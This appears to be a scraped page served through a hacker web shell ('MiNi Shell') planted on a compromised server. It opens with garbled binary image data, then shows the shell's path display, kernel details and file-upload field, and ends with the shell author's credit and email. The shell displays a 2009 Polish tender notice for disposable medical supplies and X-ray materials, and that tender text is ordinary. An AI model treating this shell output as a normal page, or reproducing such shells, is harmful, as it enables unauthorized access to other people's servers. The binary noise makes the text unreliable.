JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090313/62482-N-2009.html

<p class="kh_header"><b>Dobre Miasto: przetargu nieograniczonym na dostawę sprzętu medycznego jednorazowego użytku
oraz błon i odczynników rtg dla Zespołu Zakładów Opieki Zdrowotnej w Dobrym Mieście</b><br>
<b>Numer ogłoszenia: 62482 - 2009; data zamieszczenia: 13.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Zakładów Opieki Zdrowotnej , ul. Grunwaldzka 10b, 11-040 Dobre Miasto, woj. warmińsko-mazurskie, tel. 089 6151216, 6151225, faks 089 6161216.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.http:bip.powiat-olsztynski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przetargu nieograniczonym na dostawę sprzętu medycznego jednorazowego użytku
oraz błon i odczynników rtg dla Zespołu Zakładów Opieki Zdrowotnej w Dobrym Mieście.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy sprzętu jednorazowego użytku dla Zespołu Zakładów Opieki Zdrowotnej 
w Dobrym Mieście. 
1. Zamówienie podzielone jest na 7 pakietów, które obejmują:
   Pakiet 1 *) -  Rękawice medyczne jednorazowego użytku, 
   Pakiet 2 -      Sprzęt medyczny jednorazowego użytku, 
   Pakiet 3 -     Cewniki, zgłębniki, 
   Pakiet 4 -      Materiały zużywalne do EKG i USG, 
   Pakiet 5-       Pojemniki na zużyty sprzęt medyczny, 
   Pakiet 6-       Pozostały sprzęt i materiały medyczne jednorazowego użytku, 
   Pakiet 7-       Błony i odczynniki rtg, CPV 32354110-3
 i szczegółowo zostały opisane w załączniku Nr 2 do SIWZ - formularzu cenowym.
    
*) Zamawiający  oczekuje dostarczenia wraz z ofertą przetargową  po pięć par rękawiczek  każdej pozycji pakietu w celu oceny zgodności jakości oferowanego asortymentu z asortymentem dostarczanym. 
Ocena zgodności jakości oferowanego asortymentu odbywać się będzie tylko w sytuacjach, gdy dostarczany asortyment będzie różnił się od asortymentu zaoferowanego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą się ubiegać wykonawcy, którzy:
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)nie podlegają wykluczeniu  z postępowania o udzielenie zmówienia  na podstawie 
art. 24 ust. 1 i 2.
 2. Ocena spełnienia ww warunków dokonana zostanie zgodnie z formułą   spełnia - nie spełnia , w oparciu o informacje zawarte w dokumentach lub oświadczeniach  
wyszczególnionych w  dziale IX niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie iż w/w warunki wykonawca spełnił. 
Zamawiający wezwie  wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów potwierdzających spełnianie   warunków udziału w postępowaniu lub złożyli pełnomocnictw, albo którzy złożyli dokumenty zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, , do ich złożenia w wyznaczonym terminie chyba że mimo ich złożeniaoferta Wykonawcy podlega odrzuceniu,  albo konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy winni dostarczyć następujące oświadczenia i dokumenty:

1. Na potwierdzenie posiadanych uprawnień do wykonywania określonej działalności
    Wykonawca winien dostarczyć następujące dokumenty:
a)  Koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia  i licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym lub oświadczenie Wykonawcy, że   ustawy nie nakładają obowiązku posiadania koncesji, zezwolenia i licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym.
b) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
c)  Oświadczenie, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczeniezdrowotne i społeczne. W przypadku gdy Wykonawca zalega z płatnościami w ZUS, Urzędzie Skarbowym - zaświadczenie wystawione przez w/w organy, że uzyskał przewidziane prawem zwolnienie, odroczeni lub Kasy Rolniczego Ubezpieczenia Społecznego  lub rozłożenie na raty zaległych
płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.	Na potwierdzenie warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, Wykonawca dostarczy: 
Wykaz minimum 3 wykonanych dostaw w okresie ostatnich 3 lat przed dniem wszczęcia postępowania  o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością  dostawom stanowiącym przedmiot amówienia , z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy te zostały wykonane należycie;
3.  Na potwierdzenie sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca dostarczy:
Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
4.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu wymienionego w pkt. 1b i 1c niniejszego działu składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że:
1)nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2)nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3)nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Dokumenty, o których mowa w pkt. 4 ppkt. 1) i 3) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument, o którym mowa w pkt. 4 ppkt. 2) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
5. Wypełniony formularz OFERTA - Załącznik nr 1 do SIWZ.
6. Wypełniony Załącznik Nr 2 - Formularz cenowy do SIWZ.
7. Załącznik Nr 2 - formularz cenowy w wersji elektronicznej - dyskietka 3,5 lub płyta CD
8. Oświadczenie o spełnieniu art. 22 ust.1 ustawy Prawo Zamówień publicznych i nie podleganiu wykluczeniu z art. 24 ustawy - zał. Nr 3 do SIWZ.
9. Dokumenty potwierdzające, że przedstawione w ofercie wyroby medyczne są dopuszczone  do obrotu i stosowania na terenie Rzeczpospolitej Polskiej oraz, że spełniają wymogi określone w ustawie z dnia 20 kwietnia 2004 r. o wyrobach medycznych  ( Dz. U. z 2004 r. Nr 93, poz. 896 z późn. zm.). 
( Na dokumentach należy zaznaczyć Nr pakietu i pozycji, którego dotyczą).
10. Zaparafowany wzór umowy - załącznik Nr 4 do SIWZ.
11. Wykaz wykonanych dostaw w ostatnich - załącznik Nr 5 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.http:bip.powiat-olsztynski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Zakładów Opieki Zdrowotnej w Dobrym Mieście 
11-040 Dobre Miasto 
ul. Grunwaldzka 10 B.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2009 godzina 12:00, miejsce: Sekretariat Zespółu Zakładów Opieki Zdrowotnej w Dobrym Mieście 
11-040 Dobre Miasto 
ul. Grunwaldzka 10 B.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rękawice medyczne jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rękawice lateksowe diagnostyczne pudrowane, niejałowe S, M, L 
a 100 szt. op.1500
2.Rękawice chirurgiczne  sterylne, pudrowane  rozmiar 8,  7?, 7 	para 550.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzęt medyczny jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Strzykawki 2 ml, dwuczęściowe, jednorazowe, sterylne typu LUER a 100 szt.	op.	65
2.Strzykawki 5 ml dwuczęściowe, jednorazowe, sterylne typu LUER a 100 szt.	op.	97
3.	Strzykawki 10 ml dwuczęściowe, jednorazowe, sterylne typu LUER a 100 szt.	op.	78
4.	Strzykawki 20 ml dwuczęściowe, jednorazowe, sterylne typu LUER a 100 szt.	op.	28
5.	Strzykawki 50 ml. Z rozszerzeniem do 60 ml., trzyczęściowe, jednorazowe, sterylne do pomp infuzyjnych typu LUER - LOCK	szt.	300
6.	Strzykawki 100 ml. trzyczęściowe, cewnikowe,  jednorazowe, sterylne typu LUER 	szt.	75
7.	Strzykawki do insuliny poj. 1 ml. j.u. 
(40 I U/ml) z igłą 0,4x13 jałowe, niepirogenne, sterylne a 200 szt.	op.	2
8.	Igły jednorazowego użytku, iniekcyjne dwuczęściowe, sterylne typu LUER, a 100 szt. 	
	0,5x25;	op.	30
	0,7x30;	op.	55
	0,8x40; 	op.	125
	0,9x40; 	op.	15
	1,2x40	op.	83

10.	Kaniula dożylna typu Venflon, jałowa 
a´ 50 szt. rozmiar wg skali Gauga (G)	

16 G:  OD 1.7-1,8   L 50 mm	op.	1				
17 G:  OD- 1.4-1,5  L 45 mm	op.	1				
20 G:  OD 1.1          L 32 mm	op.	32			
22G:   OD 0.9          L 25 mm	op.	31			
18G:   OD 1,2-1,3   L 32mm-38 mm	op.	4			
18 G:  OD 1.3          L 45 mm	op.	12			
24 G:  OD 0.7          L 19 mm	op.	1			
11.Przyrządy do przetaczania płynów infuzyjnych sterylne, jałowe typu IS, LUER-LOCK	szt.	4700		 	 	 		 
12.Przyrządy do przetaczania krwi i jej preparatów jałowe, jednorazowego użytku
szt.	100		 	 	 	 	 
13.Przedłużacze do pomp infuzyjnych jałowe, jednorazowego użytku, transparentne 1500 mm typu LUER-LOCK	szt.	450		 	 	 	 	 
14.Korki do kaniul jednorazowego użytku typu LUER-LOCK 	szt.	650		 	 	 	 	 
15.Nakłuwacze automatyczne, jałowe, głębokość nakłuć  2,4mm a 100 szt.
op.	70.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.10-6, 33.14.13.09-.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Cewniki, zgłębniki,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cewniki urologiczne dwudrożne, jałowe CH 14,16,18,20 typu FOLEYA a 10 szt.	op.	17
2.Cewniki do odsysania dróg oddechowych jałowe CH 14,16	szt.	180
3.Cewniki do podawania tlenu przez nos dla dorosłych, jałowe	szt.	200
4.Zgłębniki żołądkowe jałowe jednorazowego użytku  CH 16;18;	szt.	60
5.Worki do zbiórki moczu z odpływem, z podziałką, z drenem zakończonym łącznikiem schodowym z zastawką bezzwrotną i zaworem typu T lub równoważne	szt.	210
6.Rurki intubacyjne z mankietem, jednorazowego użytku ( 7; 7,5; 8; 8,5 ;9 )	szt.	60
7.Rurki ustno-gardłowe ( nr 2; 3; 4;) jednorazowego użytku	szt.	60
8.Zestawy do lewatywy jednorazowego użytku	szt.	65.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Materiały zużywalne do EKG i USG,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier EKG  112 mm x 25 mm	rol.	210
Papier EKG  104 mm x 40 mm	rol.	8
Papier EKG 108mmx25mm	rol.	10
Elektrody EKG okrągłe dla dorosłych jednorazowego uzytku3M Ag/AgCl a 50 szt.	op.	87
Żel  przewodzący do EKG 500 g	szt.	8
Żel na bazie wodnej do  USG 500g	szt.	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.71.11.40-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pojemniki na zużyty sprzęt medyczny,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pojemniki na zużyty sprzęt medyczny jednorazowego użytku z przykrywką
 5 - litrowe	szt.	110
Pojemniki na zużyty sprzęt medyczny jednorazowego użytku z przykrywką 
2 - litrowe	szt.	180
Pojemniki na zużyty sprzęt medyczny jednorazowego użytku z przykrywką 
1- litrowe	szt.	250
Pojemniki na zużyty sprzęt medyczny jednorazowego użytku z przykrywką 
0,7- litrowe	szt.	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.23-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pozostały sprzęt i materiały medyczne jednorazowego użytku, CPV 39511100-8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ostrza chirurgiczne  ze stali węglowej jednorazowego użytku, jałowe rozmiar 11,15
 a 100 szt.	op.	10
Szyny do unieruchomiania palców 230x13mm	szt.	50
Fartuchy jednorazowego użytku włókninowe zielone ze ściągaczem, wiązane z tyłuszt.	250
Prześcieradła włókninowe  jednorazowego użytku 210cm x 150 cm zieloneszt.170
Wziernik ginekologiczny typu francuskiego, jałowy, jednorazowego użytkuszt.800
Szkiełka  podstawowe cięte z polem do zapisu grubość 1 mm a50 szt.op.	10
Pensety jałowe czyste mikrobiologiczne z tworzywa sztucznego, jednorazowego użytku	szt.	25
Sterylne szczoteczki cytologiczne, ginekologiczne, jednorazowego użytku 	szt.	600
Dren tlenowy 2.1 m	szt.	55
Koce ratunkowe 	szt.	20
Opaski identyfikacyjne dla zmarłych 	szt.	120.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.11.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Błony i odczynniki rtg,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Błona XR  lub równoważna
35 cm  x 43 cm a100 szt.	op.	15
2.Błona XR lub równoważna
 35 cm x 35 cm a100 szt.	op.	15
3.Błona XR lub równoważna
30 cm x 40 cm a100 szt.	op.	5
4. Błona XR lub równoważna
 18 cm x 43 cm a100 szt.	op.	8
5.Błona XR lub równoważna 18 cm x 24 cm a100 szt.	op.	12
6.Błon XR lub równoważna 24 cm x 30 cm a100 szt.	op.	15
7.Błon dental 3 lub równoważna 3 cm x 4 cm a150 szt. *)	op.	6
8.Utrwalacz**)	Zestaw 2 x 20 l 	11
9.Wywoływacz**)	Zestaw 2 x 20 l	12
10.Koperty RTG 35cm  x 35 cm a100 szt.	op.	9
11.Koperty RTG 30cm  x 40 cm a100 szt.	op.	5
12.Koperty RTG 24 cm  x 30 cm a100 szt.	op.	8
13.Koperty RTG 4 cm x 5 cm a100 szt.	op.	7
14.Koperty RTG 18 cm x 24 cm a100 szt.	op.	7
15.Koperty RTG 18 cm x 43 cm a100 szt.	op.	3
16.Koperty RTG 35 cm x 43 cm a100 szt.	op.	7.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.35.41.10-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com